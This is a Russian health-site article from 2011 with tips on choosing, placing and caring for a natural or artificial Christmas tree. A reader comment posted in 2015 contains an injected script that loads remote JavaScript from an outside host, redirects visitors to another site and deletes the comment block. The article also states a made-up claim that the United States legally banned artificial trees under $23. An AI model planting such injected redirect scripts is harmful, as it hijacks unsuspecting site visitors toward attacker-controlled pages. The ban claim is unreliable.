Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как выбрать елку  >>  Как выбрать елку
 
Обратная связь
 

Как выбрать елку

Размер шрифта
27 декабря 2011 07:13
  • google_analytics: false
  • Нравится

4 правила, которые необходимо знать всем тем, кто хочет принести в дом безопасную для здоровья елку.

1. Безопасность для здоровья

Натуральная елка

• Будьте осторожны! Химическая обработка против вредителей на коре дерева или для сохранности товарного вида опасна для здоровья. Эти вещества могут вызвать аллергию и приступ бронхиальной астмы.
• Запах ели должен быть натуральным.
• Требуйте у продавца биосертификат.

Искусственная елка

• Чем ниже цена искусственной ели, тем больше некачественных материалов и токсичных пластификаторов в ее составе. Прочитайте инструкцию.
• В Америке законодательно запретили покупать искусственные елки дешевле 23 долларов, так как эти деревья изготавливают из отходов, которые могут вызвать рак.
• Перед тем, как купить елку, понюхайте ее: она не должна пахнуть красителями и химией.

2. Качество изготовления

Натуральная елка

При покупке ели ударьте местом среза по земле, если хвоя обильно осыпалась, значит, дерево старое. У недавно срубленной ели ветви гнутся, но не ломаются. Если дерево срублено давно, то ветви легко сломать. Так же это может быть признаком того что дерево обморожено.

Искусственная елка

Если хвоя мягкая, то нужно провести рукой как бы «против шерсти», иголки должны сразу же распрямиться и не осыпаться. Если хвоя у елки жесткая, то нужно слегка подергать за иголки. У качественного изделия иголки отрываться не будут.

3. Пожарная безопасность

Елка должна быть огнеупорной. Оптимальным вариантом является материал с добавлением антипиренов, которые препятствуют возгоранию. Елку нужно устанавливать как можно дальше от любых отопительных приборов. Помещение должно хорошо проветриваться. Елка должна устойчиво стоять на полу, чтобы в случае случайного задевания она не опрокинулась и не нанесла травмы окружающим.

Свечи

Не ставьте зажженные свечи рядом с ветвями дерева, от длительного воздействия повышенной температуры, хвоя может начать тлеть. Не следует зажигать бенгальские огни возле елки, это может привести к пожару. Расстояние между источником огня и елкой должно быть не меньше метра, чтобы искры не попадали на хвою.

Гирлянды

Электрические гирлянды обязательно должны быть с сертификатом, где необходим номер пожарного сертификата. Это говорит о том, что гирлянда была испытана в пожарной лаборатории. Всегда выключайте гирлянду, когда ложитесь спать, или уходите на улицу.

4. Хранение и уход

Натуральная елка

• Если елку сразу поставить в тепло, хвоя может осыпаться от перепада температур. Несколько часов дайте ей постоять в прохладном месте и только после этого вносите в тепло.
• Чтобы елка дольше стояла, смешайте песок с аспирином (послужит антисептиком против гнилостных бактерий), сахаром и солью (это будет питанием для живой елки).
• Перед тем как опустить дерево в песок, нужно снять кору на 10 см от места среза, чтобы дерево лучше впитывало вещества.
• Поливайте елку раз в два дня водой с четвертью таблетки аспирина.

Чтобы собрать осыпавшуюся хвою, можно воспользоваться широким скотчем.

Искусственную елку лучше хранить в плотно закрытой упаковке, иначе она будет собирать пыль, грязь и насекомых.

Видеосюжеты по теме:

Новогодняя елка. Как ее правильно выбрать

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.